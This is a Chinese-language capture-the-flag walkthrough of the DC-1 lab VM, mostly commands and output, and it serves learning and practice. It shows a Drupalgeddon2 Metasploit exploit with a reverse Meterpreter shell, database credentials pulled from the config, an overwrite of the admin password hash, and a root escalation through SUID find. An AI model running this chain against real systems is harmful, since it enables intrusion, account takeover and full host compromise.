【offensive-security】3.DC-1靶机
dc-1_1.png
一、获取靶机信息
1.已知信息:
- IP: 192.168.245.193
2.获取信息:
- nmap扫描开启的服务
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# nmap -sV -A 192.168.245.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 14:45 CST
Nmap scan report for 192.168.245.193
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 50550/tcp6 status
| 100024 1 55270/udp status
| 100024 1 55271/udp6 status
|_ 100024 1 57092/tcp status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/26%OT=22%CT=1%CU=31332%PV=Y%DS=2%DC=T%G=Y%TM=6358D7
OS:C6%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=8)S
OS:EQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M
OS:54ENNT11NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=389
OS:0%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 429.93 ms 192.168.49.1
2 430.05 ms 192.168.245.193
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds
首先先查看80端口,是一个CMS站点,Drupal 7 上msf查看有无可利用的漏洞
- MSF getshell Drupal 7
┌──(lo0p㉿0xlo0p)-[~]
└─$ msfconsole
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can upgrade a shell to a Meterpreter
session on many platforms using sessions -u
<session_id>
msf6 > search Drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
有N多选择,这里我测试了使用2018年的API属性注入漏洞
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.245.193
rhosts => 192.168.245.193
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.49.245
lhost => 192.168.49.245
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 192.168.49.245:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.245.193
[*] Meterpreter session 1 opened (192.168.49.245:4444 -> 192.168.245.193:40926 ) at 2022-10-26 14:52:33 +0800
meterpreter > shell
Process 3438 created.
Channel 0 created.
ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
cat flag1.txt
Every good CMS needs a config file - and so do you.
进入shell以后发现当前用户为www-data,是一个低权限用户,当前目录下有一个flag1.txt,提示我们去查找一下这个cms站点的配置文件,于是乎去百度
Drupal 默认安装的目录结构 - 腾讯云开发者社区-腾讯云 (tencent.com)
配置文件在: sites/default/settings.php,下面截取重要信息部分
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
/**
拿到了数据库的库名、用户、密码以及第二个flag提示,于是我们进去数据库看看
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
mysql -u dbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 79
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use R0ck3t
use R0ck3t
ERROR 1044 (42000): Access denied for user 'dbuser'@'localhost' to database 'R0ck3t'
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
先使用python创建一个交互式的shell,否则进不去mysql
我们经过查询,拿到了该站点的用户表数据,但是密码是加密的,这个时候想想上面flag2的提示
Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?
暴力和字典攻击并不是获得访问权限的唯一途径(而且您需要访问权限)。你能用这些凭据做什么?
提示不一定需要爆破,那我们就去百度一下Drupal的密码加密规则
如何重置Drupal 7的用户密码 - 雨滴米 - ITeye博客
www-data@DC-1:/var/www$ php scripts/password-hash.sh "123456"
php scripts/password-hash.sh "123456"
password: 123456 hash: $S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA
拿到了新的hash,我们进mysql update一下就可以登录了
mysql> update users set pass='$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';
<dTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';
Query OK, 1 row affected (0.01 sec)
Rows matched: 1 Changed: 1 Warnings: 0
修改后我们进入web系统,使用admin登录,并且找到了flag3的提示
dc-1_2.png
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
特殊的PERMS将有助于找到密码,但您需要执行该命令来确定如何获取阴影中的内容。
提示给的很到位了,我们去查找具有SUID权限的可执行文件
www-data@DC-1:/var/www$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
一眼看中了find命令,https://gtfobins.github.io/gtfobins/find/ 找到了find的利用点,并成功提权root,拿到了第一个key和flag4提示
www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd /home
cd /home
# ls
ls
flag4 local.txt
# cat local.txt
cat local.txt
a68de45775de2a3c662c669556630844
# cd flag4
cd flag4
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
我们进root的目录看下
# cd /root
cd /root
# ls
ls
proof.txt thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# cat proof.txt
cat proof.txt
f06c05f682238e5ea97034108a9caa74
收工
网友评论